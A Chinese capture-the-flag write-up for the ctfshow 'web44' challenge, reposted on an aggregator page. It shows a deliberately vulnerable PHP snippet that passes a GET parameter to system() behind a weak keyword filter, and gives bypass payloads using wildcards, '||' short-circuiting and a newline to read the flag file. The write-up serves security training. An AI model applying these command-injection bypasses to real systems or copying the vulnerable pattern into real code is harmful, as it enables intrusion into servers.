当前位置: 首页 > news >正文

ctfshow web入门 web44

news 2025/7/1 18:10:55

信息收集

依旧是把所有输出丢弃,这一次多了flag的过滤,没啥好说的,用*或者?代替就可以了

if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/;|cat|flag/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

解题

依然是想办法给他后面的语句屏蔽了就行
||:短路,前面返回值为真后面就不会执行了
%0a:换行

ls||
tac fla*||
tac fla????? %0a

web43    目录    web45

http://www.dtcms.com/a/167492.html

相关文章:

  • 如何用AI生成生成个人简历
  • 2025深圳杯、东三省数学建模B题数模AI全网专业性第一
  • MATLAB R2024a安装教程
  • Python 常用内置函数详解(九):type()函数——获取对象类型或获取一个新的类型对象
  • 【Tool】vscode
  • Unity图片导入设置
  • d202551
  • [蓝桥杯 2023 国 Python B] 划分 Java
  • 【Unity】MVP框架的使用例子
  • Http详解
  • AI日报 · 2025年05月01日|DeepSeek 发布新一代定理证明模型 Prover V2
  • 【数据结构】 复杂度
  • 2025五一杯数学建模竞赛选题建议+初步分析
  • OpenGL-ES 学习(9) ---- OpenGL-ES 简介和基本 Pipeline
  • 专题二十一:无线局域网——WLAN
  • Python地图绘制模块cartopy入门
  • Java学习手册:Spring 数据访问
  • PostgreSQL数据类型
  • 面试中系统化地解答系统设计题:通用方法论
  • 向量数据库和关系型数据库的区别,优点,缺点和典型应用场景
  • Linux安全清理删除目录bash脚本
  • 从零到一构建数据科学全流程实战:最新技术与企业级开发
  • Python:Python3 异常和文件
  • Rerank详解
  • 【CF】Day48——Codeforces Round 979 (Div. 2) D
  • 数字智慧方案5981丨智慧农业解决方案(55页PPT)(文末有下载方式)
  • 2024年12月 C/C++(二级)真题解析#中国电子学会#全国青少年软件编程等级考试
  • 开始一个vue项目
  • Android 移动开发:ProgressBar (水平进度条)
  • 第十一届蓝桥杯 2020 C/C++组 门牌制作